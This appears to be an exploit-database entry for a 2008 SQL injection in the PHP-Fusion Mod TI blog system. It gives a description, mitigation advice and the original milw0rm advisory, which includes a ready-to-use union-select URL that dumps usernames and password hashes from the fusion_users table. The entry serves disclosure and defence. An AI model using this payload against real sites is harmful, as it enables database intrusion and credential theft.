PHP-Fusion Mod TI - Blog System Sql Injection

vendor:

PHP-Fusion Mod TI

by:

Sina Yazdanmehr (R3d.W0rm)

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP-Fusion Mod TI

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP-Fusion Mod TI – Blog System Sql Injection

A SQL injection vulnerability exists in the blog system of PHP-Fusion Mod TI. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to insufficient sanitization of user-supplied input in the 'blog_id' parameter of the 'blog.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable script. This will allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL commands that are passed to the database. Additionally, the application should use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

#####################################################################################
####              	PHP-Fusion Mod TI - Blog System Sql Injection                ####
#####################################################################################
#                                                                                   #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm)                                                #
#Discovered by : Sina Yazdanmehr (R3d.W0rm)                                         #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi
#####################################################################################
#                                                                                   #
#Download : http://www.phpfusion-mods.net/infusions/downloads/dldb.php?op=view&id=157
#                                                                                   #
#####################################################################################
#                                      [Bug]                                        #
#                                                                                   #
#http://Site/[path]/blog.php?page=blog_id&id=-9999'+union+select+0,1,2,user_name,user_password,5+from+fusion_users/*
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-12-28]